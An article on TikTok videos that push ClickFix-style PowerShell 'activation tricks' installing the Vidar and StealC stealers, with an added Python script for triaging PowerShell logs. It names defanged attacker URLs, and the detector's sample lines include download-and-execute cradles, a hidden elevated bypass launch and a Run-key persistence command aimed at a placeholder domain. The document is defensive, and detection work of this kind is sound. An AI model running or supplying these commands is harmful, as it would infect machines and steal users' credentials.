Cybercriminals are taking advantage of TikTok in a rather devious way: they are uploading videos that trick people into unwittingly installing malware that steals personal information. We're talking about Vidar and StealC, two types of malware designed to sneak onto your computer and steal everything from passwords to banking data.
The most worrying thing is how they do it. They use videos that, in many cases, seem to be generated with artificial intelligence, where they explain step by step how to “activate” Windows, Microsoft Office or premium functions in apps such as CapCut and Spotify. But these so-called tricks include PowerShell commands that are actually instructions for infecting your computer.
And because TikTok can make a video go viral in minutes, these hoaxes can easily reach hundreds of thousands of people before anyone even questions them.
The videos that are circulating are almost identical to each other. The camera angles or the URL that appears to download the file change a bit, but other than that, they are practically copies. All of this points to the fact that they are probably being generated in an automated fashion.
In addition, the voice guiding the video sounds quite robotic, as if it were made by an artificial intelligence, which reinforces the idea that there is no real person behind it, but rather automated tools creating content en masse.
To give you an idea of the reach: one of these videos, which supposedly teaches you how to “improve your Spotify experience instantly,” already has almost half a million views, more than 20,000 “likes” and more than 100 comments. That's how easily they spread.
ClickFix video on TikTok (Source: Trend Micro)
In these videos, the attackers tell people to copy and paste a PowerShell command as part of a supposed “trick” to improve Spotify. But what that command actually does is download a script from a suspicious site (hxxps://allaivo[.]me/spotify) that installs malware like Vidar or StealC. And not only that: the script runs in the background, with elevated permissions, without you even realizing what's going on.
Once the malware gets into your computer, Vidar can do everything: take screenshots of your desktop, steal your saved passwords, card data, browser cookies, personal files and even information from your authentication apps like Authy.
StealC is also quite aggressive. It gets into dozens of browsers and cryptocurrency wallets to steal any information it finds useful.
And if that wasn't enough, after infecting your computer, the script fetches a second PowerShell script from a different site (hxxps://amssh[.]co/script[.]ps1) that makes the malware run automatically every time you turn on your computer. It's as if it installed itself to live there, silently.
Attack flow (Source: Trend Micro)
ClickFix is a deceptive tactic that attackers use to make people install malware without realizing it. How do they do it? Very simple: they display fake messages, such as system errors or CAPTCHA-like checks, which are actually designed to get you to run a malicious script. Once you do, the malware is downloaded and installed on your device.
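The copy-paste chain the article describes (a download cradle piped straight into Invoke-Expression, launched hidden and elevated, then pinned in place with a Run-key entry) is exactly the shape a defender wants to catch in PowerShell script-block logging (Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log). The triage script below is an added example, not code from the article or from Trend Micro: the log lines are constructed, the domain is the reserved placeholder example.invalid, and the indicator names, the log-line layout and the scoring thresholds are my own assumptions.

```python
"""Heuristic triage of PowerShell script-block log text for ClickFix-style
copy-paste chains. Added example; log lines are constructed, domain is the
placeholder example.invalid, indicator names and scoring are assumptions."""
import re
from dataclasses import dataclass, field

# Name -> case-insensitive regex over the ScriptBlockText. Order matters only
# for the order in which hits are reported.
INDICATORS = {
    "download_cradle": r"\b(?:iwr|irm|curl|wget|Invoke-WebRequest|Invoke-RestMethod)\b|DownloadString|Net\.WebClient",
    "invoke_expression": r"\|\s*(?:iex|Invoke-Expression)\b|\biex\s*\(",
    "execution_policy_bypass": r"-(?:ExecutionPolicy|ep)\s+Bypass",
    "hidden_window": r"-(?:WindowStyle|w)\s+Hidden",
    "encoded_command": r"-(?:EncodedCommand|enc|e)\s+[A-Za-z0-9+/=]{20,}",
    "elevation": r"-Verb\s+RunAs",
    "run_key_persistence": r"CurrentVersion\\Run\b",
    "scheduled_task": r"Register-ScheduledTask|schtasks(?:\.exe)?\s+/create",
}

# Indicators that on their own justify an analyst's look.
HIGH_RISK = {"execution_policy_bypass", "hidden_window", "encoded_command",
             "elevation", "run_key_persistence", "scheduled_task"}

# Constructed sample in the assumed layout "<EventID> | host=<name> | ScriptBlockText=<script>".
SAMPLE_LOG = [
    "4104 | host=WS01 | ScriptBlockText=Get-ChildItem -Path C:\\Users\\alice\\Documents",
    "4104 | host=WS01 | ScriptBlockText=Set-ExecutionPolicy -Scope CurrentUser RemoteSigned",
    # the 'activation trick' shape from the article, with a placeholder domain
    "4104 | host=WS02 | ScriptBlockText=iwr https://example.invalid/spotify | iex",
    "4104 | host=WS02 | ScriptBlockText=Start-Process powershell -Verb RunAs -ArgumentList '-ep Bypass -w Hidden -c \"irm https://example.invalid/script.ps1 | iex\"'",
    "4104 | host=WS02 | ScriptBlockText=Set-ItemProperty -Path 'HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run' -Name Updater -Value 'powershell -w Hidden -File C:\\Users\\Public\\u.ps1'",
    # a plain download with no execution: low interest, not a chain
    "4104 | host=WS03 | ScriptBlockText=Invoke-WebRequest https://example.invalid/report.csv -OutFile report.csv",
]


@dataclass
class Finding:
    host: str
    script: str
    indicators: list = field(default_factory=list)
    verdict: str = "none"


def parse_line(line: str):
    """Split one constructed log line into (event_id, host, script).
    maxsplit=2 keeps any ' | ' inside the script text (e.g. '| iex') intact."""
    event_id, host_field, script_field = line.split(" | ", 2)
    return (event_id.strip(),
            host_field.removeprefix("host="),
            script_field.removeprefix("ScriptBlockText="))


def verdict_for(hits):
    """download + execute in one block is the ClickFix chain; a lone
    high-risk flag is suspicious; a lone cradle is merely low interest."""
    if "download_cradle" in hits and "invoke_expression" in hits:
        return "clickfix_chain"
    if HIGH_RISK & set(hits):
        return "suspicious"
    if hits:
        return "low"
    return "none"


def analyze(host: str, script: str) -> Finding:
    hits = [name for name, pattern in INDICATORS.items()
            if re.search(pattern, script, re.IGNORECASE)]
    return Finding(host=host, script=script, indicators=hits, verdict=verdict_for(hits))


def triage(log_lines):
    """Return one Finding per 4104 line, in input order; other event IDs are skipped."""
    findings = []
    for line in log_lines:
        event_id, host, script = parse_line(line)
        if event_id == "4104":
            findings.append(analyze(host, script))
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f"{f.verdict:15} {f.host:5} {', '.join(f.indicators) or '-'}")
```

The verdict tiers are deliberately coarse: a download cradle alone is common in legitimate admin scripts, so it only rates "low", while cradle-plus-Invoke-Expression in the same block is the copy-paste chain itself and is worth an alert even before the persistence step shows up. Expect false positives from installers that are documented with `iwr ... | iex`; the value of the script is in ordering what an analyst reads first, not in blocking.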
While most of these attacks are aimed at Windows users (using PowerShell commands), versions adapted for macOS and Linux have also been seen, so no one is completely out of the woods.
And we're not just talking about common criminals: even government-backed cyber-espionage groups have used this technique. Teams like APT28 and ColdRiver (linked to Russia), Kimsuky (from North Korea) and MuddyWater (from Iran) have employed similar methods in digital espionage campaigns in recent months.
Incredible as it may seem, this is not the first time TikTok has become a channel for distributing malware. Some time ago, attackers took advantage of a viral challenge called “Invisible Challenge” to trick thousands of people into downloading a supposed app, which actually installed WASP Stealer, a malware that stole Discord accounts, passwords, credit cards and even cryptocurrency wallets.
And it doesn't stop there: hundreds of videos have also been seen on TikTok with fake cryptocurrency sweepstakes, using well-known names such as Elon Musk, Tesla or SpaceX to lure people into the trap. In short: what looks like just entertainment can sometimes hide something quite shady.